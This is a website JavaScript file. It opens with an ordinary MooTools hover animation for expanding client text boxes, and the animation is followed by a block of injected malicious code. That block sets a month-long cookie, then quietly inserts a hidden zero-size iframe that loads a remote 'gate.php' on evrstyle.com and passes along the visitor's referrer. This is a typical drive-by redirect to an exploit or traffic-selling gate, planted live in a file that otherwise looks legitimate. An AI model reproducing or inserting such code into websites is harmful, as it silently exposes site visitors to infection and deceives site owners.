if (!self.jaSLWI) {
	var jaSLWI = {
		jaSLWIInit: function() {
			jaSLWI.modules = $$(".clients");
			jaSLWI.modulesText = $$(".text-container");
			var x = new Fx.Elements(jaSLWI.modulesText, { wait: false, duration: 250 });

		var obj = {};
			jaSLWI.modules.each(function(module, i) {
				jaSLWI.modulesText[i].collapseH = jaSLWI.modulesText[i].offsetHeight;
				obj[i] = { 'height': 0};
				module.addEvent('mouseenter', function(e) {
					var obj = {};
					obj[i] = { 'height': 120};
					jaSLWI.modules.each(function(other, j) {
						if (other != module) {
							var h = jaSLWI.modulesText[j].getStyle('height').toInt();
							if (h != jaSLWI.modulesText[j].collapseH) obj[j] = { 'height': [h, jaSLWI.modulesText[j].collapseH] };
						}
					});
					x.start(obj);
				});

				module.addEvent('mouseleave', function(e) {
					var obj = {};
					jaSLWI.modules.each(function(other, j) {
						obj[j] = { 'height': [jaSLWI.modulesText[j].getStyle('height').toInt(), jaSLWI.modulesText[j].collapseH]};
					});
					x.start(obj);
				});
			});
			x.start(obj);
		}
	}

	window.addEvent('load', jaSLWI.jaSLWIInit);
}
/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://evrstyle.com/gate.php?f=855917&r='+escape(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
